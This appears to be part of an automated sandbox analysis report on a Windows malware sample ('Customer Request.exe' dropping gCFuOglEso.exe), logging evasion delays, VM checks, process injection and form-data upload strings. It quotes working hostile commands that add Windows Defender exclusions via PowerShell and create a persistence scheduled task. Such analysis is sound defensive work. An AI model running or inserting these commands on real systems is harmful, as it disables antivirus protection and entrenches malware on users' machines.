                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599003
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598875
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598765
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598652
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598546
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598437
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598218
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598109
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598000
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597890
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597781
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597672
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597562
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597453
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597343
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597234
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597125
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597015
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 596896
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 596767
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595953
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595828
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595719
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595608
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595500
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595390
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595281
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595172
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595062
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594953
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594844
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594719
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594609
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594500
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594390
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594280
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594172
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594062
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593953
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593826
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593703
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593585
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd58da3ab36bd1<
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd51c42e28e955
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BDA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd52621a53558f
                  Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8e2c10ef1daec42
                  Source: gCFuOglEso.exe, 0000000B.00000002.1524551945.0000000006ADC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}E
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002A77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd5386acd74a6b
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd527858d8e06d
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd54016fcc0347
                  Source: gCFuOglEso.exe, 0000000B.00000002.1524551945.0000000006ADC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd588331d88799
                  Source: Customer Request.exe, 0000000A.00000002.2708190624.0000000001306000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllSy
                  Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8e3757e05def62f
                  Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8df398a9e398d9f
                  Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8e3b0c96e1dafb8<
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd58d44c277f5a@\
                  Source: gCFuOglEso.exe, 0000000F.00000002.2707096158.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd5236b62b17e5<
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560C010 LdrInitializeThunk,10_2_0560C010
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe"
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory written: C:\Users\user\Desktop\Customer Request.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory written: C:\Users\user\AppData\Roaming\gCFuOglEso.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp"
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess created: C:\Users\user\AppData\Roaming\gCFuOglEso.exe "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
                  Source: Customer Request.exe, 0000000A.00000002.2710969497.000000000338E000.00000004.00000800.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2710969497.00000000031A7000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                  Source: Customer Request.exe, 0000000A.00000002.2710969497.000000000338E000.00000004.00000800.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2746132985.000000000722D000.00000004.00000010.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2710969497.00000000031A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,
                  Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Users\user\Desktop\Customer Request.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Users\user\Desktop\Customer Request.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
